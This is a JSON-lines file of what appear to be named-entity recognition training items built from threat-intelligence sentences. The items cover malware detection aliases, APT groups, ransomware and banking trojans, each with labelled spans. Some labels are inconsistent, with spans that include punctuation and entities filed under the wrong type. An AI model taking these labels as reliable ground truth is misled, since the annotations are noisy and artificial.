{"text": "A backdoor also known as: W32.DepanserX.Trojan Backdoor/W32.Prorat.351276.AA Backdoor.Win32.Prorat!O Backdoor.Prorat.A8 Backdoor.Prorat.Win32.7 Backdoor/Prorat.b Win32.Trojan.WisdomEyes.16070401.9500.9886 W32/ProratP.L Backdoor.Prorat Win32/ProRat.I BKDR_PRORAT.F Win.Trojan.Prorat-9 Backdoor.Win32.Prorat.b Trojan.Win32.Prorat.fzuk Backdoor.W32.Prorat.l70O BackDoor.ProRat.1736 BKDR_PRORAT.F BehavesLike.Win32.Backdoor.fc W32/ProratP.L Backdoor/Prorat.cm BDS/Prorat.AC Trojan[Backdoor]/Win32.Prorat.f Backdoor:Win32/Prorat.N Backdoor.Win32.Prorat.351276.B Backdoor.Win32.Prorat.b Win32.Backdoor.Prorat.A Trojan/Win32.Prorat.R1757 MalwareScope.Trojan-PSW.Pinch.1 Backdoor.Prorat.AJ Backdoor.Win32.Prorat W32/Prorat.I!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000608", "source": "cyner2_train"}}
{"text": "As it turns out, the downloaded file is an HTA HTML Application file, a format that is becoming more and more common as a malware launch point.", "spans": {"MALWARE: malware": [[122, 129]]}, "info": {"id": "cyner2_train_000609", "source": "cyner2_train"}}
{"text": "This blog entry will introduce the details of Asruex.", "spans": {}, "info": {"id": "cyner2_train_000610", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Rockse.Win32.2 BKDR_ROCKSE.A Backdoor.Rockse BKDR_ROCKSE.A Backdoor.Win32.Rockse Trojan.Win32.Rockse.hkwa Backdoor.Win32.Rockse BackDoor.Rockse BehavesLike.Win32.Dropper.gc Trojan.Win32.Rockse W32/Risk.RDKH-7511 BDS/Rockse.2 Trojan[Backdoor]/Win32.Rockse Win32.Hack.Rockse.kcloud Backdoor.W32.Rockse!c Backdoor.Win32.Rockse Backdoor.Rockse Win32.Backdoor.Rockse.Wkbu Backdoor.Rockse!5s6/g9tFaiQ W32/Rockse.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000611", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Z.Notsocial.240128 Trojan.EmailSpy.origin BehavesLike.Win32.BadFile.dc Downloader/Win32.Mdm.R1834 Trojan.Win32.SpamTool", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000612", "source": "cyner2_train"}}
{"text": "These countries are linked by a trade agreement as well as a cooperation on a range of non-financial matters.", "spans": {}, "info": {"id": "cyner2_train_000615", "source": "cyner2_train"}}
{"text": "Cerberus embeds the following set of features that allows itself to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( Local injects obtained from C2 ) Keylogging SMS harvesting : SMS listing SMS harvesting : SMS forwarding Device info collection Contact list collection Application listing Location collection Overlaying : Targets list update SMS : Sending Calls : USSD request making Calls : Call forwarding Remote actions : App installing Remote actions : App starting Remote actions : App removal Remote actions : Showing arbitrary web pages Remote actions : Screen-locking Notifications : Push notifications C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Architecture : Modular Overlay attack Most Android banking Trojans use overlay attacks to trick the victim into providing their personal information ( such as but not limited to : credit card information , banking credentials , mail credentials ) and Cerberus is no exception .", "spans": {"MALWARE: Cerberus": [[0, 8], [1041, 1049]]}, "info": {"id": "cyner2_train_000616", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: Trojan.Unix.Mlw.evxpjx Linux.Trojan.Rootkit.40 Trojan/Linux.Rootkit.40 Trojan.Linux.Rootkit Linux/RootKit.40 Win32/RootKit.Rootkit.05f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000617", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SvchostPP.Worm Trojan.VBS.Downloader.U Trojan.VBS.Downloader.U Trojan.StartPage.Win32.8162 Trojan.VBS.Downloader.U Win32.Trojan.WisdomEyes.16070401.9500.9984 W32/Trojan2.MMWH Trojan.Qhosts Win32/Delf.OF TROJ_FAM_00011b6.TOMA Win.Trojan.Delf-8259 Trojan.VBS.Downloader.U Trojan.VBS.Qhost.v Trojan.VBS.Downloader.U Trojan.Win32.StartPage.blxqw Trojan.VBS.Downloader.U Trojan.MulDrop1.37420 TROJ_FAM_00011b6.TOMA BehavesLike.Win32.Downloader.ch Trojan.VBS.Qhost W32/Trojan.DBWF-7475 Troj.VBS.StartPage.lgP3 Trojan.VBS.Qhost.v Trojan/Win32.Fakesys.R2395 VBS/TrojanDownloader.Psyme.NHE Trojan.DL.Delf.FCBW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000618", "source": "cyner2_train"}}
{"text": "The Carbanak financial APT group made the headlines when Group-IB and Fox-IT broke the news in December 2014, followed by the Kaspersky report in February 2015.", "spans": {"THREAT_ACTOR: The Carbanak financial APT group": [[0, 32]], "ORGANIZATION: Group-IB": [[57, 65]], "ORGANIZATION: Fox-IT": [[70, 76]], "ORGANIZATION: Kaspersky": [[126, 135]]}, "info": {"id": "cyner2_train_000620", "source": "cyner2_train"}}
{"text": "Mandiant assesses with high confidence that APT43 is a moderately-sophisticated cyber operator that supports the interests of the North Korean regime.", "spans": {"ORGANIZATION: Mandiant": [[0, 8]], "THREAT_ACTOR: APT43": [[44, 49]], "THREAT_ACTOR: moderately-sophisticated cyber operator": [[55, 94]]}, "info": {"id": "cyner2_train_000623", "source": "cyner2_train"}}
{"text": "This is why getting access to their devices could be worth a lot more than for a normal user.", "spans": {}, "info": {"id": "cyner2_train_000624", "source": "cyner2_train"}}
{"text": "ISSP informs on new wave of cyber attack in Ukraine on August 22, 2017", "spans": {}, "info": {"id": "cyner2_train_000625", "source": "cyner2_train"}}
{"text": "Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.", "spans": {"MALWARE: Sowbug": [[0, 6]], "ORGANIZATION: the organizations": [[83, 100]]}, "info": {"id": "cyner2_train_000627", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9973 Trojan.DownLoader25.64806 Trojan.MSILPerseus.D23337 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000630", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Wanex.A WORM_WANEX.TOMA Win32.Trojan.WisdomEyes.16070401.9500.9879 W32.Wanex WORM_WANEX.TOMA Win.Trojan.Delf-1033 Virus.Win32.Wanex Virus.Win32.Wanex.ggsj W32.Wanex!c Win32.Wanex.A Win32.HLLW.Pewk.46651 Virus.Wanex.Win32.1 backdoor.win32.xtrat.a Win32/Wanker.a GrayWare[AdWare]/Win32.Wanex.a Win32.Wanex.a.57014 Trojan/Win32.Buzus.R2227 Virus.Win32.Wanex Win32/Wanex.A Win32.Wanex Trojan-GameThief.Win32.OnLineGames Win32/Wanex.A W32/Wanexorl.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000631", "source": "cyner2_train"}}
{"text": "Talos recently spotted a targeted phishing attack with several unique characteristics that are not normally seen.", "spans": {"THREAT_ACTOR: targeted phishing attack": [[25, 49]]}, "info": {"id": "cyner2_train_000633", "source": "cyner2_train"}}
{"text": "Last week, thanks to the Check Point web sensor network, our researchers discovered a new and massive IoT Botnet, IoTroop'.", "spans": {"ORGANIZATION: the Check Point web sensor network,": [[21, 56]], "ORGANIZATION: researchers": [[61, 72]], "MALWARE: IoT Botnet, IoTroop'.": [[102, 123]]}, "info": {"id": "cyner2_train_000634", "source": "cyner2_train"}}
{"text": "IRC Botnets alive, effective & evolving Magento exploits in the wild The CozyDuke toolset, which we believe has been under active development since at least 2011, consists of tools for infecting targeted hosts, establishing and maintaining backdoor access to the hosts, gathering information from them and gaining further access to other hosts inside the victim organization.", "spans": {"MALWARE: IRC Botnets": [[0, 11]], "VULNERABILITY: Magento exploits": [[40, 56]], "MALWARE: The CozyDuke toolset,": [[69, 90]], "MALWARE: backdoor": [[240, 248]]}, "info": {"id": "cyner2_train_000635", "source": "cyner2_train"}}
{"text": "In particular, we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and access management' tradecraft – both groups were constantly going back into the environment to change out their implants, modify persistent methods, move to new Command Control channels and perform other tasks to try to stay ahead of being detected.", "spans": {"THREAT_ACTOR: groups": [[166, 172]], "SYSTEM: environment": [[209, 220]]}, "info": {"id": "cyner2_train_000637", "source": "cyner2_train"}}
{"text": "The attack originates from a phishing email containing a Word document in Arabic language.", "spans": {}, "info": {"id": "cyner2_train_000638", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom:Win32/Cryptomix.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000640", "source": "cyner2_train"}}
{"text": "The downloader also uses an uncommon technique to perform a timing check to decide whether it should perform its malicious activities.", "spans": {}, "info": {"id": "cyner2_train_000641", "source": "cyner2_train"}}
{"text": "There has been a proliferation of malware specifically designed to extract payment card information from Point-of-Sale POS systems over the last two years.", "spans": {"MALWARE: malware": [[34, 41]], "SYSTEM: Point-of-Sale POS systems": [[105, 130]]}, "info": {"id": "cyner2_train_000642", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Flooder.24292 TROJ_GICHTY.A W32/Risk.YWAF-8783 Hacktool.Flooder TROJ_GICHTY.A Win.Trojan.Gitch-1 Flooder.Win32.GichtyChatFlood.11 Trojan.Win32.GichtyChatFlood.dhga Flooder.W32.GichtyChatFlood.11!c TrojWare.Win32.Flooder.Chat.11 Trojan.Gichty.11 Tool.GichtyChatFlood.Win32.2 BehavesLike.Win32.Mydoom.mc Flooder.Chat.GichtyChatFlood.11 TR/GichtyChatFlood.11 Trojan.Heur.bmuee9li6sbi Flooder.Win32.GichtyChatFlood.11 Trojan.Win32.VB.2644 Win32/Flooder.Chat.GichtyChatFlood.11 Win32.Trojan.Gichtychatflood.Efbn Trojan.GichtyChatFlood!JHbWXCe+Dp8 Backdoor.Win32.VB Malware_fam.gw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000645", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Adware.Rogue.Windefender.B Aplicacion/TotalSecure2009.ae Fraudtool.TotalSecure2009!VN58ZBrXUCY Trojan-FakeAV.Win32.TotalSecure2009.ae Adware.Rogue.Windefender.B Trojan.Win32.Delflob!IK Adware.Rogue.Windefender Trojan.Fakealert.3458 Trojan:Win32/Delflob.I Adware.WinDefender2009.R.2828800 Adware.Rogue.Windefender.B Win-AppCare/Windefender.2828800 RogueAntiSpyware.WinDefender Trojan.Win32.Delflob", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000647", "source": "cyner2_train"}}
{"text": "It is worth noting that this number only shows hosts potentially vulnerable to the first exploit, while the second one is also required to execute code on the router or modem.", "spans": {"VULNERABILITY: hosts potentially vulnerable": [[47, 75]], "MALWARE: exploit,": [[89, 97]], "MALWARE: execute code": [[139, 151]], "SYSTEM: router": [[159, 165]], "SYSTEM: modem.": [[169, 175]]}, "info": {"id": "cyner2_train_000648", "source": "cyner2_train"}}
{"text": "The data is encoded prior to transmission using a dword XOR routine, so IDS technology is unlikely to see raw Track data flying around a compromised network.", "spans": {"SYSTEM: IDS technology": [[72, 86]], "SYSTEM: compromised network.": [[137, 157]]}, "info": {"id": "cyner2_train_000649", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Hupigon.AAAH Backdoor.Hupigon.AAAH Backdoor.Trojan Trojan.Dropper.Small-159 Backdoor.Hupigon.AAAH Virus.Win32.Delf!IK Packed.Win32.Klone.~KH Backdoor.Hupigon.AAAH Win32.Troj.Loader.fw.9734 TrojanDownloader:Win32/Bulilit.A Backdoor.Hupigon.AAAH BScope.HackTool.Sniffer.WpePro Backdoor.Trojan Virus.Win32.Delf W32/Shooo.A!tr Win32/Delf.2.K", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000651", "source": "cyner2_train"}}
{"text": "The cybercriminal group Lurk was one of the first to effectively employ fileless infection techniques in large-scale attacks—techniques that arguably became staples for other malefactors.", "spans": {"ORGANIZATION: The cybercriminal group Lurk": [[0, 28]]}, "info": {"id": "cyner2_train_000652", "source": "cyner2_train"}}
{"text": "In March 2013, the country of South Korea experienced a major cyberattack, affecting tens of thousands of computer systems in the financial and broadcasting industries.", "spans": {"SYSTEM: computer systems": [[106, 122]], "ORGANIZATION: financial": [[130, 139]], "ORGANIZATION: broadcasting industries.": [[144, 168]]}, "info": {"id": "cyner2_train_000653", "source": "cyner2_train"}}
{"text": "This new RETADUP variant has features that would be useful for cybercrime instead of espionage.", "spans": {"MALWARE: RETADUP variant": [[9, 24]]}, "info": {"id": "cyner2_train_000654", "source": "cyner2_train"}}
{"text": "On November 2015, Kaspersky Lab researchers identified ATMZombie, a banking Trojan that is considered to be the first malware to ever steal money from Israeli banks.", "spans": {"ORGANIZATION: Kaspersky Lab researchers": [[18, 43]], "MALWARE: ATMZombie,": [[55, 65]], "MALWARE: banking Trojan": [[68, 82]], "MALWARE: malware": [[118, 125]], "ORGANIZATION: Israeli banks.": [[151, 165]]}, "info": {"id": "cyner2_train_000655", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Zbot.A4 Spyware.Zbot Trojan.Zbot.Win32.150744 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Zbot TROJ_MALKRYP.SM1 Trojan.Win32.Zbot.cuxeug Win32.Trojan.Spy.Pefj TrojWare.Win32.Injector.AYTP Trojan.PWS.Panda.2982 TROJ_MALKRYP.SM1 BehavesLike.Win32.PWSZbot.cc TrojanSpy.Zbot.ecmj TR/Spy.ZBot.rhwnxx Trojan[Spy]/Win32.Zbot Win32.Troj.Undef.kcloud Trojan:Win32/Tesch.B Trojan.Kazy.D53F00 Backdoor/Win32.Androm.R99103 BScope.Malware-Cryptor.Winlock.7414 Win32/Injector.AYPX TrojanSpy.Zbot!As9snjQ7nLU Trojan-Downloader.Win32.Carberp W32/Kryptik.WIF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000660", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodc3b.Trojan.b7e0 Trojan/Downloader.Vqod.bq Trojan.DL.Vqod!a48Wt68Nq30 Trojan-Downloader.Win32.Vqod.bq Trojan.Win32.Vqod.cokvn Trojan.DownLoad2.31415 TR/Dldr.Vqod.bq Trojan[:HEUR]/Win32.Unknown Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Lisfonp.A Win-Trojan/Vqod.57856.B TrojanDownloader.Vqod Win32.Trojan-downloader.Vqod.Pgmj Trojan-Downloader.Win32.Lisfonp W32/Vqod.BQ!tr.dldr Win32/Trojan.7ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000661", "source": "cyner2_train"}}
{"text": "At launching, it checks for the presence of /var/run/dhcpclient-eth0.pid. file.", "spans": {}, "info": {"id": "cyner2_train_000662", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.AutoIT.Injector.S Trojan/Cosmu.bizd AutoIt.Trojan.Injector.g Trojan.Packed.40821 Trojan.Autoit.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000664", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Small!O TrojanDownloader.Pipsek.B5 Downloader.Small.Win32.48755 Trojan/Downloader.Small.bjqy TROJ_REDOSD.SMQ Win32.Trojan.KillAV.c W32/KillAV.GG Trojan.Dropper Win32/Pigeon.BCUH TROJ_REDOSD.SMQ Trojan-Downloader.Win32.Small.bjqy Trojan.Win32.Small.bdavsq Trojan.Win32.A.Downloader.48432 TrojWare.Win32.AntiAV.nhr W32/KillAV.JXYA-5937 Trojan/Win32.Antavmu Trojan.Symmi.D2028 Trojan-Downloader.Win32.Small.bjqy Downloader/Win32.Small.R14220 Trojan.Antavmu Win32/AntiAV.NHJ Trojan.Win32.FakeUsp.c Trojan.AntiAV!GuYWyLBvRFY Trojan-Downloader.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000665", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Sality!O TrojanSpy.Zbot Trojan-Spy.Win32.Zbot.wjen Troj.Spy.W32.Zbot!c Trojan.PWS.Panda.9309 BehavesLike.Win32.Downloader.fc TR/AD.ZbotCitadel.kvrxb Trojan.Win32.Z.Zbot.312320.HY Trojan-Spy.Win32.Zbot.wjen Trojan/Win32.Zbot.C2294377 TrojanSpy.Zbot Trojan.Crypt.RV Win32/Spy.Zbot.AAO W32/Zbot.AAO!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000666", "source": "cyner2_train"}}
{"text": "This threat can collect your sensitive information without your consent.", "spans": {}, "info": {"id": "cyner2_train_000670", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PSW.Win32.Prostor!O TrojanPWS.Prostor Trojan.Prostor.Win32.53 Trojan/PSW.Prostor.h TROJ_PROSTOR.AA Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/PWStealer.APR Win32/Prostor.D TROJ_PROSTOR.AA Win.Trojan.Ag-1 Trojan-PSW.Win32.Prostor.h Trojan.Win32.Prostor.hoip Trojan.Win32.PSWProstor.16896 Virus.Malware.Sbg!c TrojWare.Win32.PSW.Prostor.~I Trojan.PWS.Prostor W32/PWS.PNJG-2228 Trojan/PSW.Prostor.y KIT/Prostor.I.1 Trojan[PSW]/Win32.Prostor Trojan-PSW.Win32.Prostor.h Trojan/Win32.Prostor.C16806 Trj/Prostor.F Win32.Trojan-qqpass.Qqrob.Lkdt Trojan.PWS.Prostor!B7NqNICS3Y4 Trojan-PWS.Win32.Prostor.h Win32/Trojan.PSW.7e6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000671", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ThundeSnS.Trojan Trojan-Clicker.Win32.VB!O Trojan.Desurou Troj.W32.Scar!c Win32.Trojan.WisdomEyes.16070401.9500.9957 Trojan.Adclicker Win32/TrojanClicker.VB.NNM TROJ_VBCLICK.SMO Win.Trojan.Adclicker-49 Trojan.Win32.Scar.qppd Win32.Trojan.Scar.Akez Trojan.DownLoad1.52605 Trojan.VB.Win32.40030 TROJ_VBCLICK.SMO Trojan/Clicker.VB.esc Trojan-Clicker.Win32.VB TR/Click.VB.esc Trojan.Heur.VP2.EF8A48 Trojan/Win32.VB.R2074 Trojan.Win32.Scar.qppd Trojan.VBRA.07317 Trojan.CL.VB!imzVbRyD0G8 Win32/Trojan.fb0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000672", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Razy.D1E0B8 Win32.Trojan.WisdomEyes.16070401.9500.9905 TSPY_LOKI.SMA Trojan.PWS.Stealer.17779 TSPY_LOKI.SMA BehavesLike.Win32.VirRansom.nh Trojan:Win32/Pwsteal.Q!bit Trojan/Win32.naKocTb.C1675893 Win32.Trojan.Dropper.Heur Trojan.naKocTb!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000673", "source": "cyner2_train"}}
{"text": "ArborNetworks For the past few months ASERT has been keeping an eye on a relatively new banking malware banker known as Pkybot", "spans": {"ORGANIZATION: ArborNetworks": [[0, 13]], "ORGANIZATION: ASERT": [[38, 43]], "MALWARE: banking malware": [[88, 103]], "MALWARE: banker": [[104, 110]], "MALWARE: Pkybot": [[120, 126]]}, "info": {"id": "cyner2_train_000675", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Hoax.W32.ArchSMS.HEUR.lFj0 Adware.Ziconarch.122880 Tool.SMSSend.178 Trojan.Win32.Ziconarch TR/ZipCoin.A HackTool[Hoax]/Win32.ArchSMS Trojan:Win32/Ziconarch.B.dam#2 Adware/Win32.SMSHoax.R13251 Win32/Trojan.048", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000680", "source": "cyner2_train"}}
{"text": "IOCs related to an attack against banks in Poland", "spans": {"ORGANIZATION: banks": [[34, 39]]}, "info": {"id": "cyner2_train_000681", "source": "cyner2_train"}}
{"text": "The ransomware author of Mole made a small mistake, which gives everyone the statistics of all the infected clients.", "spans": {"THREAT_ACTOR: The ransomware author": [[0, 21]], "MALWARE: Mole": [[25, 29]]}, "info": {"id": "cyner2_train_000682", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Kovter Ransom_HPCERBER.SMALY0A Win32.Trojan.WisdomEyes.16070401.9500.9998 Ransom_HPCERBER.SMALY0A Trojan.Win32.Pennelas.evftsg Downloader.BloKrypt.Win32.2 BehavesLike.Win32.Ransomware.hh Trojan-Downloader.Win32.Blocrypt TrojanDownloader.BloKrypt.c TR/Pennelas.tmcdy Trojan[Downloader]/Win32.BloKrypt Downloader/Win32.BloKrypt.C1680725 Trj/GdSda.A Win32/TrojanDownloader.Blocrypt.AK Trojan.DL.BloKrypt! W32/Kryptik.FKEL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000683", "source": "cyner2_train"}}
{"text": "Odin very much resembles another Locky variant, Zepto.", "spans": {"MALWARE: Odin": [[0, 4]], "MALWARE: Locky variant, Zepto.": [[33, 54]]}, "info": {"id": "cyner2_train_000684", "source": "cyner2_train"}}
{"text": "This new campaign includes new evasive macros and demonstrates continued evolution in their tools and techniques, showcasing attacker adaptation to evolving defenses and the widespread use of sandboxes.", "spans": {"THREAT_ACTOR: campaign": [[9, 17]], "MALWARE: evasive macros": [[31, 45]], "MALWARE: tools": [[92, 97]], "THREAT_ACTOR: attacker": [[125, 133]], "SYSTEM: sandboxes.": [[192, 202]]}, "info": {"id": "cyner2_train_000687", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDropper.Oblivion Trojan/Dropper.oblivion W32/Tool.JTFL-0204 TROJ_OBLIVION.B Win.Dropper.Oblivion-3 Trojan-Dropper.Win32.Oblivion Trojan.Win32.Oblivion.dksy Trojan.Win32.Z.Oblivion.53248 Troj.Dropper.W32.Oblivion!c TrojWare.Win32.TrojanDropper.Oblivion Dropper.Oblivion.Win32.1 TROJ_OBLIVION.B BehavesLike.Win32.Dropper.qt TrojanDropper.Win32.Oblivion W32.Trojan.Backdoor-Oblivion Trojan[Dropper]/Win32.Oblivion Trojan-Dropper.Win32.Oblivion Trojan/Win32.HDC.C97188 TrojanDropper.Oblivion Trj/Oblivion.Drp Win32/TrojanDropper.Oblivion Win32.Trojan-dropper.Oblivion.Wpjr Trojan.DR.Oblivion!js3IRiusBTg Trojan-Dropper.Win32.Oblivion W32/Oblivion.A!tr Win32/Trojan.Dropper.f88", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000689", "source": "cyner2_train"}}
{"text": "The other appears to be CVE-2015-1770.", "spans": {}, "info": {"id": "cyner2_train_000691", "source": "cyner2_train"}}
{"text": "A backdoor also known as: P2P-Worm.Win32.Picsys!O Worm.Picsys.CC1 Worm.Picsys.Win32.3 W32/Picsys.b Win32.Worm.Picsys.a W32/Picsys.B W32.HLLW.Yoof Win32/Picsys.A WORM_SPYBOT.PA Win.Worm.Picsys-4 P2P-Worm.Win32.Picsys.b Trojan.Win32.Picsys.cxhvjd Worm.Win32.Picsys.aab Worm.Win32.Picsys.B Win32.HLLW.Morpheus.2 WORM_SPYBOT.PA BehavesLike.Win32.Picsys.mc W32/Picsys.FYLV-4646 I-Worm/P2P.Picsys Worm[P2P]/Win32.Picsys Worm:Win32/Yoof.E Worm.Win32.P2P-Picsys.65221 Worm/Win32.Picsys.C116429 W32/Picsys.worm.b Worm.Picsys Win32/Picsys.B Worm.Picsys!vNEZkf1mA50 P2P-Worm.Win32.Picsys.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000693", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Trojan.Kazy.D5BCBA TROJ_SPNR.24AI13 Win32.Trojan.WisdomEyes.16070401.9500.9995 TROJ_SPNR.24AI13 Trojan.Win32.Scar.kdnc Trojan.DownLoader7.54481 BehavesLike.Win32.VirRansom.nc TR/Slamu.A Trojan.Win32.Scar.kdnc Trojan.Kryptik!2D0DfpBZg1g W32/DotNet.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000695", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.17708.D Trojan-GameThief.Win32.OnLineGames!O TrojanPWS.OnLineGames.ZF4 Trojan.OnLineGames.Win32.42164 Trojan/OnLineGames.bnbk Trojan.Graftor.D80DC Win32.Trojan.WisdomEyes.16070401.9500.9969 Win32/Gamepass.NKR TSPY_ONLINEG.SMV Win.Spyware.67145-2 Trojan-GameThief.Win32.OnLineGames.bnbk Trojan.Win32.OnLineGames.bqvvjm Trojan.Win32.PSWIGames.17708.E TrojWare.Win32.PSW.Onlinegames.OQU.1 Trojan.PWS.Wsgame.24647 TSPY_ONLINEG.SMV Trojan[GameThief]/Win32.OnLineGames TrojanDropper:Win32/Vtimrun.C Trojan-GameThief.Win32.OnLineGames.bnbk Dropper/Win32.OnlineGameHack.R137 BScope.Trojan-Dropper.OLGames.2512 Trojan.PWS.OnLineGames!ZUTM5XqTClQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000696", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Valhalla.2048 Win32.Valhalla.2048 Trojan.Malpack Win32.Xorala Win32/Valla.2048 W32.Xorala Win32.Valhalla.2048 Virus.Win64.Xorala.cbehdj Win32.Valhalla.2048 Win32.Valhalla.2048 BehavesLike.Win64.Chir.cm W32/Xorala.b Win32.Valhalla.2048 Virus.Win32.Xorala Win32/Valla.2048", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000697", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Spy.Bancos.Oer Trojan-PWS.Banker6!IK Trojan-PWS.Banker6 VBCrypt.DDL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000698", "source": "cyner2_train"}}
{"text": "The Locky variant of ransomware has been responsible for huge amounts of spam messages being sent on a daily basis.", "spans": {"MALWARE: The Locky variant": [[0, 17]], "MALWARE: ransomware": [[21, 31]]}, "info": {"id": "cyner2_train_000700", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.AE5C Downloader.Tibs.Win32.6 Trojan/Tibs.al Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Packed.13 Packed.Win32.Tibs.al Trojan.Win32.Small.erlei Win32.Packed.Tibs.Wtdn TrojWare.Win32.TrojanDownloader.Tibs.~mm Trojan.Packed.142 Trojan.Win32.Crypt TrojanDownloader.Tibs.amzo TR/Small.DBY.LH.14 Win32.TrojDownloader.Tibs.mm.kcloud TrojanDownloader:Win32/Nuwar.B Trojan.Heur.TP.ED17A6 Troj.Downloader.W32.Tibs.mm!c Packed.Win32.Tibs.al Trojan-Downloader.Revelation.Tibs.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000705", "source": "cyner2_train"}}
{"text": "Reports on this malware family have previously been published by both Intel Security and Microsoft.", "spans": {"MALWARE: malware": [[16, 23]], "ORGANIZATION: Intel Security": [[70, 84]], "ORGANIZATION: Microsoft.": [[89, 99]]}, "info": {"id": "cyner2_train_000707", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.KeyLogger.178176.B Win32.Backdoor.Rbot.1470B0D03 WORM_SDBOT.CTJ Virus.Win32.Rbot!IK Worm/Rbot.210944 WORM_SDBOT.CTJ Heuristic.BehavesLike.Win32.PasswordStealer.H Virus.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000708", "source": "cyner2_train"}}
{"text": "While some findings where very interesting, others were misleading or simply wrong.", "spans": {}, "info": {"id": "cyner2_train_000710", "source": "cyner2_train"}}
{"text": "Mexico has previously confirmed that it is a purchaser of NSO Group's spyware.", "spans": {"THREAT_ACTOR: NSO Group's": [[58, 69]], "MALWARE: spyware.": [[70, 78]]}, "info": {"id": "cyner2_train_000711", "source": "cyner2_train"}}
{"text": "A phone belonging to the Interdisciplinary Group of Independent Experts GIEI, a group of investigators from several countries, was sent text messages with links to NSO's exploit infrastructure", "spans": {"SYSTEM: phone": [[2, 7]], "ORGANIZATION: the Interdisciplinary Group of Independent Experts GIEI,": [[21, 77]], "ORGANIZATION: group": [[80, 85]], "ORGANIZATION: investigators": [[89, 102]], "MALWARE: NSO's exploit": [[164, 177]], "SYSTEM: infrastructure": [[178, 192]]}, "info": {"id": "cyner2_train_000713", "source": "cyner2_train"}}
{"text": "This blog post describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear phishing emails to target officials in the Indian Embassies and Indian Ministry of External Affairs MEA.", "spans": {"THREAT_ACTOR: attack campaign": [[33, 48]], "THREAT_ACTOR: attackers": [[55, 64]], "ORGANIZATION: the Indian Embassies and Indian Ministry of External Affairs MEA.": [[164, 229]]}, "info": {"id": "cyner2_train_000714", "source": "cyner2_train"}}
